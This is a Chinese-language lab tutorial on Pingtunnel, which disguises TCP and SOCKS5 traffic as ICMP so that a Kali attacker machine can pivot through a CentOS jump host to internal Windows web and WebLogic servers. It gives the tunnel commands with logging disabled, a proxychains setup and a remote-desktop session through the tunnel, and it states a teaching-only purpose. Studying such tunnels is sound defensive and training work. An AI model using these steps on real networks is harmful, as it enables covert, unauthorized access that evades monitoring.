0.实际操作视频,请移步
https://www.bilibili.com/video/BV1et4y1w7Uc/
声明:本课程仅限于网络安全教学和网络安全技术交流,严禁用于非法途径,请遵守网络安全法。
若学员因此作出任何危害网络安全行为后果自负,与我本人无关。
1.Pingtunnel简介
流行的一款ICMP隧道工具,本文介绍的Pingtunnel是go语言编写,是一款把 tcp/udp/sock5 流量伪装成 icmp 流量进行转发的工具
2.1下载地址
wget https://github.com/esrrhs/pingtunnel/releases/download/2.6/pingtunnel_linux_amd64.zip
2.2安装,解压运行即可,运行需要管理员权限
3.1靶场环境
kali 攻击机 网卡1 桥接模式 192.168.1.5
centos 跳板机 网卡1 桥接模式 192.168.1.24 网卡2 仅主机模式 10.10.10.88
win2012-web 目标机器 网卡1 仅主机模式 10.10.10.13 ,8080端口开放web服务
win2012-weblogic 目标机器 网卡1 仅主机模式 10.10.10.12 ,7001端口开放weblogic服务
3.2跳板机centos防火墙规则
4.ICMP隧道转发TCP
4.1centos跳板机运行sever端
./pingtunnel -type server -noprint 1 -nolog 1
4.2kali攻击机运行client
./pingtunnel -type client -l 127.0.0.1:7788 -s 192.168.1.24 -t 10.10.10.13:8080 -tcp 1 -noprint 1 -nolog 1
5.icmp隧道转发socks5
-type server 代表开启server端、-type client 代表开启client端、-noprint 1 不在控制台打印日志、-nolog 1 不存储日志
5.1centos跳板机运行sever端
./pingtunnel -type server -noprint 1 -nolog 1
5.2kali攻击机运行client端
# ./pingtunnel -type client -l :1080 -s 192.168.1.24 -sock5 1 -noprint 1 -nolog 1
5.3设置proxychains
[ProxyList]
socks5 127.0.0.1 1080
5.4 远程桌面到目标机器10.10.10.13
proxychains rdesktop 10.10.10.13
5.5火狐设置代理,利用FoxyProxy 工具,直接访问目标地址:端口
Proxy Type->socks,Proxy IP address or DNS name ->192.168.1.5,port ->1080
5.5 火狐浏览器直接访问本地7788端口
http://127.0.0.1:7788
